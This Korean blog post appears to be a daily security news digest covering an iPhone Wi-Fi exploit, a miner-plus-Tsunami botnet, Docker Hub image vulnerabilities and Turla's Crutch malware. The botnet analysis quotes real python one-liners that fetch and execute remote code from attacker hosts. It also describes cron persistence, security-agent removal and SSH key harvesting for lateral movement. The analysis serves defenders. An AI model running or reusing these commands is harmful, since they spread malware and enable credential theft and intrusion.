목차
- iPhone 제로 클릭 Wi-Fi 익스플로잇 해킹
- SSH 측면 이동을 구현하는 다중 벡터 Miner + Tsunami 봇넷 분석
- Docker Hub 컨테이너 이미지의 절반 이상의 심각한 취약성
- 5 년 동안 APT 공격에 사용 된 'Crutch'러시아 악성 코드 발견
1. iPhone 제로 클릭 Wi-Fi 익스플로잇 해킹
https://arstechnica.com/gadgets/2020/12/iphone-zero-click-wi-fi-exploit-is-one-of-the-most-breathtaking-hacks-ever/
- iPhone 취약점 중 하나 인 iOS 커널의 메모리 손상 버그를 패치하여 공격자가 Wi-Fi를 통해 사용자 상호 작용이 전혀 필요없이 전체 장치에 원격으로 액세스 할 수 있도록함
- 그리고 익스플로잇은 웜 가능했습니다.
- 이 Wi-Fi 죽음의 패킷 익스플로잇은 Google의 취약성 연구 부서 인 Project Zero의 연구원 인 Ian Beer가 고안
- Beer의 공격은 Airdrop과 같은 것을 작동시키는 Apple 독점 메시 네트워킹 프로토콜 인 AWDL 용 드라이버 의 버퍼 오버 플로우 버그를 악용하여 작동
- 드라이버는 모든 운영 체제에서 가장 권한있는 부분 중 하나인 커널에 있기 때문에 AWDL 결함은 심각한 해킹의 가능성이 있음
- 그리고 AWDL이 Wi-Fi 패킷을 구문 분석하기 때문에 악용은 아무것도 잘못되었다는 표시없이 무선으로 전송 될 수 있음
- 방법은 이메일, 사진, 메시지, 암호 및 키 체인에 저장된 암호화 키를 포함한 사용자의 개인 데이터에 대한 전체 액세스 권한이있는 임플란트를 설치
- 이 공격은 랩톱, Raspberry Pi 및 일부 기성 Wi-Fi 어댑터를 사용
- 프로토 타입 임플란트를 설치하는 데는 약 2 분이 걸림
- 익스플로잇은 공격자의 Wi-Fi 범위 내에있는 장치에서만 작동합니다.
https://youtu.be/_sTw7GGoJ6g
2. SSH 측면 이동을 구현하는 다중 벡터 Miner + Tsunami 봇넷 분석
이 봇넷 버전의 새로운 기능
- 모네로 XMR 채굴 외에 쓰나미 가 두 번째 페이로드로 추가됨
- 전파를위한 Oracle WebLogic RCE 익스플로잇
- EDR 및 모니터링 도구, AliBaba의 Aliyun 및 Tencent의 qcloud 제거
- SSH 사용자, 키, 호스트 및 포트를 열거하는 SSH Lateral Movement에 대한 개선 된 기능 사용
- 드롭 위치가 다른 여러 셸 스크립트 및 Python 스크립트를 사용하고 하드 코딩 된 IP 주소 및 도메인을 사용하여 바이너리 호스팅 웹 서버에 연결
- 대량 스캔을 사용하여 SSH 및 Redis 서비스를 스캔하고 Redis-cli 및 SSH 무차별 대입 도구를 사용하여 서버를 감염시키는 데 사용되지 않는 코드를 포함
poc.xml SHA256 : af1f3e57544583561dbd02201407782aef7dce47489e703ad6ac9f231363b439
- 1 단계에서는 두 개의 페이로드, 쉘 스크립트, xms 및 python 스크립트를 실행
- shellscript xms는 curl에서 bash로 파이프 됨
- 실패 할 경우 분석을 방지하기 위해 wget으로 가져 와서 실행 및 제거
- Python 스크립트는 탐지 및 분석을 피하기 위해 base64로 인코딩 된 명령을 사용하여 가져오고 실행
- 에코 된 base64 인코딩 문자열
python -c 'import urllib; exec (urllib.urlopen (“hxxp : //205.185.116.78/d.py”) .read ())'
2 단계 A) – xms 쉘 스크립트
xms 쉘 스크립트 SHA256 : 72acbfdeadfa31d7ccda7fdcc93944b1948e263239af8850e5b44c518da0a4c5
수행 된 작업 :
- 셸 경로 구성
- 적용 모드에있는 경우 SELinux를 허용 모드로 전환
- 사용자 프로세스의 한계를 50000으로 설
- RedHat huge 페이지 수를 가상 CPU 코어 수의 3 배로 설정
- LD 예압을 삭제
- 3333, 4444, 5555, 7777, 14444, 5790, 45700, 2222, 9999, 20580 및 13531 포트에서 통신하는 프로세스를 종료
- 23.94.24.12:8080 및 134.122.17.13:8080 서비스에 연결된 프로세스도 종료
- 이러한 작업은 이전에 실행중인 소프트웨어와 잠재적 인 경쟁 봇을 킬
- 난수를 생성하고 해당 난수를 기반으로 스레드를 300 또는 800으로 설정합
- 사용되지 않거나 주석 처리 된 SSH bruteforce 코드에 사용
- DER 제거
- AliBaba Security Agent 인 Aliyun이 설치되어 있는지 확인하고 설치되어 있는 경우 제거
- qcloud, tencent의 클라우드 모니터링이 설치되어 있는지 확인하고,이 경우 제거
- 호스트의 WAN IP 주소의 / 16 범위를 가져옴
- pool.supportxmr.com에 연결할 수 있는지 확인
- bash.givemexyz.in에 도달 할 수 있는지 확인하고이 경우 다음을 실행
python -c 'import urllib; exec (urllib.urlopen (“hxxp : //bash.givemexyz.in/dd.py”) .read ())'
- bash.givemexyz.in에 연결할 수없는 경우 다음을 실행
python -c 'import urllib; exec (urllib.urlopen (“hxxp : //205.185.116.78/d.py”) .read ())'
- SSH Lateral Movement : xms 쉘 스크립트는 서버가 이전에 연결된 호스트를 감염 시키려고 함
- icanhazip.com을 사용하여 피해자 호스트 IP를 확인
- 사용자, 호스트, 키 및 포트를 열거하고 4 개의 중첩 루프를 실행하여 모든 조합을 시도
- 이 정보를 찾기 위해 id_rsa *를 구문 분석
- .ssh / config; .bash_history; 홈 및 루트 디렉토리의 .pem 파일. 또한 활성 SSH 연결에 대한 정보를 얻기 위해 실행중인 프로세스를 나열
지속성 : 지속성 메커니즘은 이전 버전의 봇넷과 동일
- xms 스크립트는 xms 쉘 스크립트와 python 스크립트를 매분, 2 분마다, 3 분마다, 30 분마다, 매시간 다운로드하고 실행하는 cronjob을 통해 지속성을 달성 함
- /etc/cron.d/root
- /etc/cron.d/apache
- / var / spool / cron / root
- / var / spool / cron / crontabs / root
- /etc/cron.hourly/oanacroner1
- 시스템 시작시 /etc/init.d/down을 덮어 씀
3. Docker Hub 컨테이너 이미지의 절반 이상의 심각한 취약성
https://www.infosecurity-magazine.com/news/half-of-docker-hub-images-feature/
- 공개적으로 사용 가능한 Docker Hub 컨테이너 이미지의 절반 이상에 심각한 취약성이 포함
- 사이버 보안 스타트 업 Prevasio는 Linux 기반 컨테이너를위한 세계에서 가장 인기있는 리포지토리 서비스 인 Docker Hub에서 호스팅되는 4 백만 개의 이미지를 모두 스캔
- 이미지는 격리 된 제어 환경에서 실행됨
- 실행하는 동안 Prevasio는 각 컨테이너의 동작을 분석하고 모든 파일을 스캔했으며 패키지 및 소프트웨어 종속성에 대한 전체 취약성 평가를 수행
- 전체적으로 스캔 된 이미지의 51 %에 하나 이상의 심각한 취약점이 포함되어 있음
- 또한 6000 개 이상이 잠재적으로 유해하거나 악의적 인 것으로 평가되었지만 전체의 1 % 미만에 불과
- 이 중 가장 많은 수 44 %는 코인 채굴 자였으며 악성 npm 패키지 23 %, 해킹 도구 20 % 및 Windows 악성 코드 6 %가 뒤를 이음
- 올해 초 Docker는 취약성 스캐닝을 Docker 워크 플로에 통합 할 Snyk와의 파트너십을 발표 했지만 여전히 악성 이미지 문제가 남아 있음
4.5 년 동안 APT 공격에 사용 된 'Crutch'러시아 악성 코드 발견
https://thehackernews.com/2020/12/experts-uncover-crutch-russian-malware.html
- ESET 연구자들이 코드 명 " Crutch "로 명명 한이 악성 코드는 러시아에 기반을 둔 고급 해커 그룹 인 Turla (일명 Venomous Bear 또는 Snake)가 정부, 대사관, 군사 기관에 대한 다양한 공격과 창을 통해 광범위한 공격을 수행 한 것으로 알려져 있음.
- "이러한 도구는 민감한 문서 및 기타 파일을 Turla 운영자가 관리하는 Dropbox 계정으로 유출하도록 설계되었습니다."라고 말함
- 백도어 임플란트는 이름이 알려지지 않은 유럽 연합의 외교부에 속한 여러 기계에 비밀리에 설치되어있음
- 2016 년의 Crutch 샘플과 Turla의 또 다른 2 단계 백도어 인 Gazer를 식별하는 것 외에도 다양한 도구 세트의 최신 멀웨어는 그룹이 높은 프로필 대상에 대한 스파이 활동 및 정찰에 지속적으로 집중하고 있음을 나타냄
- Crutch는 이전에 Turla에 기인 한 1 단계 임플란트 인 Skipper 제품군 또는 2019 년 중반 전후에 발견 된 두 가지 다른 버전의 맬웨어와 함께 PowerShell Empire 라고하는 악용 후 에이전트 를 통해 제공
- 전자는 명령을 수신하고 결과를 업로드하기 위해 공식 HTTP API를 사용하여 하드 코딩 된 Dropbox 계정과 통신하는 백도어를 포함했지만, 최신 변종 ( "Crutch v4")은 발견 된 파일을 자동으로 업로드 할 수있는 새로운 기능에 대한 설정을 피함
- Windows Wget 유틸리티를 사용하여 로컬 및 이동식 드라이브를 Dropbox에 추가
'Trash > legacy' 카테고리의 다른 글
| 20/12/04 일일 보안 동향 (0) | 2020.12.04 |
|---|---|
| 20/12/02 일일 보안 동향 (0) | 2020.12.02 |
| 일일 보안 동향 알림 (0) | 2020.12.01 |
| 20/12/01 일일 보안 동향 (0) | 2020.12.01 |
| [Android] ListView 예제 소스 (0) | 2015.06.05 |
